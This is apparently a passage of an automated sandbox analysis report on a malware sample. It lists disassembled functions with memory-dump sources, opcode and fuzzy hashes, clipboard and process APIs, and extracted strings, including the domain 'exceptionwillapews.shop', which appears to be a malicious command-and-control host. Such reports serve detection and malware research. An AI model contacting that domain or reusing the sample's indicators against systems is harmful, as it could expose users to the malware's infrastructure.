                                                                        • Opcode ID: e85327cca07778d5fa5c6387c8ed6258d52b71aa4bff88396f83fddc4650c8f7
                                                                        • Instruction ID: 7589fa0b55ddb035dc5953139a33f16b58e0856eb98253357792a4a2099d3379
                                                                        • Opcode Fuzzy Hash: e85327cca07778d5fa5c6387c8ed6258d52b71aa4bff88396f83fddc4650c8f7
                                                                        • Instruction Fuzzy Hash: 7511E2B04193418BD718DF14C0A066BBBF1EF8A344F545E0EE8E29B240D339D6069B5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02FA36F3 Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857426384.0000000002FA3000.00000040.00000020.00020000.00000000.sdmp, Offset: 02FA3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2fa3000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction ID: f7890f98fe52319655ad63c8c090572821c9a01d8982ec3eb50c81e689a0cf17
                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                        • Instruction Fuzzy Hash: FA118EB2344104AFD744DF55DCD1EA6B3EAEB89360B2981A5EE04CB312D675E801CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EFD947 Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 42d26c2ab1b44984a9f7f7845e8e781a4e0d2b51721c767c2f90d122121d682b
                                                                        • Instruction ID: 53b6e2b17de0f3c2673aed92f02c3038a4a84a8ba1be561adb93f50faa15724e
                                                                        • Opcode Fuzzy Hash: 42d26c2ab1b44984a9f7f7845e8e781a4e0d2b51721c767c2f90d122121d682b
                                                                        • Instruction Fuzzy Hash: C711A2315086529FC725CF18C4D153AFBF1FB85258F198A6DE9EA57342C330E800CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE0D90 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction ID: 5ce871fb98224e38cebad1ce5b417b2ded3e42d7d4cebc24b78064d041ee61b1
                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                        • Instruction Fuzzy Hash: A801F272A50A008FDF21DF20C804BAE33E5EB8630AF0590B4D90BE7285E3B0A9418F80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F15D32 Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
                                                                        • Instruction ID: 00dada0dd3851741171ab3f48056eb2851cf6f6aacf27fe76429bc8c4a67c8c6
                                                                        • Opcode Fuzzy Hash: f21a35c5c3999f510f2e72610054c5e10ecc36b1628d5fe1b25180f555448144
                                                                        • Instruction Fuzzy Hash: 5411E2705083419FE708CF10D46876BBBA1EBC5318F108A1DE9A92B681C37AD90ACB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F1A340 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
                                                                        • Instruction ID: 02c563cda89366facf7a8ad3864ec0c112155f1a0e7ae21801ff27780d330bc1
                                                                        • Opcode Fuzzy Hash: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
                                                                        • Instruction Fuzzy Hash: 49F09A35A09301DFC709CF19C09022AFBF0AF86650F58982DE5D9C3350DB31E955CB46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043A0D9 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
                                                                        • Instruction ID: 5fc0ae8dc96022c44960700c7ab2adaf62af461dc2bf8e2718f495d239de32d0
                                                                        • Opcode Fuzzy Hash: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
                                                                        • Instruction Fuzzy Hash: 2EF06735A083019BC708CF19C09062BFBF0AF8A750F28986EA4D9D3351DB30ED558B46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EED527 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                                                                        • Instruction ID: d5bf99fb001aaab243cdf10255db9702b3ec754abee07cf7bd7a0b283d264722
                                                                        • Opcode Fuzzy Hash: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                                                                        • Instruction Fuzzy Hash: A9E0C267B456A10BAB18CE754CA06B7B7E99B8722EB1CE46DD493D7108C228C8064254
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040D2C0 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                                                                        • Instruction ID: b4944c70536aa93040e23a0d3de02e03ae6e0bd8259874742134aa93b1285e44
                                                                        • Opcode Fuzzy Hash: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                                                                        • Instruction Fuzzy Hash: A7E0C266B057610BA718CDB548A01B7F7E55A87322F1CA4BED492E3244C13CC805425C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF0140 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
                                                                        • Instruction ID: 832b43b70c8be9becace1e9a524aaac1633fa4a646e66cb56c40eb57a0982910
                                                                        • Opcode Fuzzy Hash: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
                                                                        • Instruction Fuzzy Hash: CAC04C249440015A81199B15DDE5879B3796687945740743CD90BD3260DB14E409991D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040FED9 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
                                                                        • Instruction ID: 832b43b70c8be9becace1e9a524aaac1633fa4a646e66cb56c40eb57a0982910
                                                                        • Opcode Fuzzy Hash: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
                                                                        • Instruction Fuzzy Hash: CAC04C249440015A81199B15DDE5879B3796687945740743CD90BD3260DB14E409991D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EF67E9 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
                                                                        • Instruction ID: 8b35dc4ed4a9966cb47b13b221a0358a275917a8b9a254330dbaa609285bd0fa
                                                                        • Opcode Fuzzy Hash: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
                                                                        • Instruction Fuzzy Hash: 72C04C3CBAD240978348CF00D990875F77AE78B212B19B12DEC5513325D534E886850C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00416582 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
                                                                        • Instruction ID: 8b35dc4ed4a9966cb47b13b221a0358a275917a8b9a254330dbaa609285bd0fa
                                                                        • Opcode Fuzzy Hash: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
                                                                        • Instruction Fuzzy Hash: 72C04C3CBAD240978348CF00D990875F77AE78B212B19B12DEC5513325D534E886850C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F196C8 Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
                                                                        • Instruction ID: b9894db37ae32ee18a48b4ed2c803f881acc9e4ff8f0547e5b61e8919c04ec24
                                                                        • Opcode Fuzzy Hash: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
                                                                        • Instruction Fuzzy Hash: DBB002B8E58305AF8704DE25D480826F7F0AB5A260F11B859A495E7221D235D840CE59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00439461 Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
                                                                        • Instruction ID: b9894db37ae32ee18a48b4ed2c803f881acc9e4ff8f0547e5b61e8919c04ec24
                                                                        • Opcode Fuzzy Hash: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
                                                                        • Instruction Fuzzy Hash: DBB002B8E58305AF8704DE25D480826F7F0AB5A260F11B859A495E7221D235D840CE59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F01E52 Relevance: .0, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 61740a4a6b66c39d809455402d7a4086d40630e1e758bb71a0f0d6e76ce45bab
                                                                        • Instruction ID: 52999745cbb203c1a25c64183f6c0f89abb0d6799bf4f8fa6901f5394969ad65
                                                                        • Opcode Fuzzy Hash: 61740a4a6b66c39d809455402d7a4086d40630e1e758bb71a0f0d6e76ce45bab
                                                                        • Instruction Fuzzy Hash: EB90022CC0A002C9C1400F405491070F170F21371BE0072A052A1330158560C101954C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F0E047 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 153clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
                                                                        • String ID: 7$8$I$K$L$N
                                                                        • API String ID: 2111159801-2422513041
                                                                        • Opcode ID: 28e11e74ed648139ae773ca2817a633438cb684fda283ca951c4a17a4810f50c
                                                                        • Instruction ID: b2775d39049e68e040b6537ec9e8fa771795760b6c831ab1f5a8e4526734de09
                                                                        • Opcode Fuzzy Hash: 28e11e74ed648139ae773ca2817a633438cb684fda283ca951c4a17a4810f50c
                                                                        • Instruction Fuzzy Hash: 6E517DB1508740CFD721DF39C485A16BFE1AF1A354F048A99E8DA8B7D6D335E805CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040DBF0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 403COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: 8C$exceptionwillapews.shop
                                                                        • API String ID: 621844428-4113046735
                                                                        • Opcode ID: f8ffe6f3ace5f896577972ecdcc84118bcef70ea3a73d9791e90e5bfc6f12540
                                                                        • Instruction ID: c3754cf6d4af3efd44086515a8e4feea577dce0be4ef3330c692d516742b2779
                                                                        • Opcode Fuzzy Hash: f8ffe6f3ace5f896577972ecdcc84118bcef70ea3a73d9791e90e5bfc6f12540
                                                                        • Instruction Fuzzy Hash: A8222860008BC1CED726CF388498716BFA16B26224F1987DDD8E64F7E7C3759509CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02F0A0FB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: String
                                                                        • String ID: ,$0$7
                                                                        • API String ID: 2568140703-2155719752
                                                                        • Opcode ID: fdf24cba6eb891dda7fa07123bd2484475bc0c1eb32a0717ef83079535187b47
                                                                        • Instruction ID: bddfd0e4d0d94fddd1b689fa02772f0a083e9f7f6512978644cbd091c88ac95b
                                                                        • Opcode Fuzzy Hash: fdf24cba6eb891dda7fa07123bd2484475bc0c1eb32a0717ef83079535187b47
                                                                        • Instruction Fuzzy Hash: B191D572A097818FD734CE2CC8D07DBBBD2AB99364F184A2DD5E98B3C1D6359844CB42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00429E94 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SysStringLen.OLEAUT32 ref: 00429E9E
                                                                          • Part of subcall function 004359F0: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00435A87
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1856074169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1856074169.000000000044A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_5Dw2hTQmiB.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeapString
                                                                        • String ID: ,$0$7
                                                                        • API String ID: 983180023-2155719752
                                                                        • Opcode ID: 3014c82a8aa4ecce16e822321478b9489deaecac6dfa0ed20a8e26eb28c689a7
                                                                        • Instruction ID: c908502eda0842b721617bfb232101f265745d64272503eb8c3c42083bdf6617
                                                                        • Opcode Fuzzy Hash: 3014c82a8aa4ecce16e822321478b9489deaecac6dfa0ed20a8e26eb28c689a7
                                                                        • Instruction Fuzzy Hash: 4791D471B097918FC335CE28C4907EBBBD2AB95324F594A2DD8E58B3C1D6398845CB46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 02EE94A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 02EE94E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2ee0000_5Dw2hTQmiB.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
                                                                        • API String ID: 621844428-3137510881
                                                                        • Opcode ID: 59d31c83763740c401a164c8abda1a317b471818f0df02a94b0c3ec7177b1887
                                                                        • Instruction ID: daca02cfec705019ed85bee2d22c29023300415620078819fbeb6ebcd11ef803
                                                                        • Opcode Fuzzy Hash: 59d31c83763740c401a164c8abda1a317b471818f0df02a94b0c3ec7177b1887
                                                                        • Instruction Fuzzy Hash: 05F096B188451097CE107BB59A0566E7BE99F11320F40A23DD9C742246DB31400D8EB3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%